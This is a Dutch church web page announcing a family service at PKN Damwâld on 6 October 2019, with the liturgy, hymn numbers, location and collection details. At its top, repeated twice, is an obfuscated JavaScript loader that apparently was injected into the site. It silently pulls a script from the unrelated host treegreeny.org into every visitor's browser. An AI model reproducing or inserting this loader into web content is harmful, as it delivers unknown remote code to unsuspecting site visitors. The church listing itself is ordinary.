;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Aangepaste gezinsdienst - PKN Damwâld
zondag 6 oktober 2019
14:00 uur

Aangepaste gezinsdienst

Thema: Storm op het meer

Informatie

Voorganger:Ds. G.J. Otter
Organist:Nienke van der Heide-Visser
Thema:Storm op het meer
Liturgie
Lied voor de dienst Elb 425
Welkom en kaars aansteken
We zingen: Elb 478
Stil Gebed, Votum en Groet
We zingen: Elb 468 : 1,2,3,4 en 5
Geloofsbelijdenis .
We zingen: Elb 459
Gebed
We lezen: Lucas 8 : 22-25
We zingen: Elb 187 : 1 en 3
Preek .
We zingen: Elb 448 : 1,2 en 3
Dankzegging en voorbede
We zingen: Elb 466
Collecte
slotlied : kids opw. 185
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kerk & Israël

Kerk en Israël - Leren door ontmoeting en dialoog
Voor de Protestantse Kerk is de relatie met Israël een essentieel element van de eigen identiteit. De Protestantse Kerk onderstreept de verbondenheid met het volk Israël en ondersteunt daarom het gesprek met en over Joodse wortels in plaatselijke gemeenten met inspiratiematerialen, ontmoetings- en netwerkdagen en het tijdschrift Kerk & Israël onderweg. In 2019 ondersteunen we samen met het Centraal Joods Overleg het werk in Nes Ammim, een internationale Christelijke gemeenschap in Israël gericht op ontmoeting en dialoog. Ook is er nieuw gespreksmateriaal gemaakt voor gemeenten, De Uitdaging, waarin Christenen worden uitgedaagd om lessen te leren uit de dialoog met joden. Uw steun via de collecte maakt al deze activiteiten mogelijk.

Tweede collecte: Kerk
Uitganscollecte: Kerk